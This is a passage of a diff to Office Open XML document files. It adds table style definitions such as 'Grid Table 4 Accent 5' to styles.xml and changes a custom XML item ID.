+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="double" w:sz="2" w:space="0" w:color="FFD966" w:themeColor="accent4" w:themeTint="99"/>
+        </w:tcBorders>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="firstCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:tblStylePr>
+  </w:style>
+  <w:style w:type="table" w:styleId="GridTable4-Accent5">
+    <w:name w:val="Grid Table 4 Accent 5"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="49"/>
+    <w:rsid w:val="00E21863"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="9CC2E5" w:themeColor="accent5" w:themeTint="99"/>
+      </w:tblBorders>
+    </w:tblPr>
+    <w:tblStylePr w:type="firstRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
+          <w:insideH w:val="nil"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5" w:themeFill="accent5"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="double" w:sz="4" w:space="0" w:color="5B9BD5" w:themeColor="accent5"/>
+        </w:tcBorders>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="firstCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Vert">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Horz">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
+      </w:tcPr>
+    </w:tblStylePr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -10096,7 +10669,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D2DD94C7-461A-4BBE-B427-9B0EAF15490F}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EE542079-DE88-4BF1-A5E0-D0BA2D45687F}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>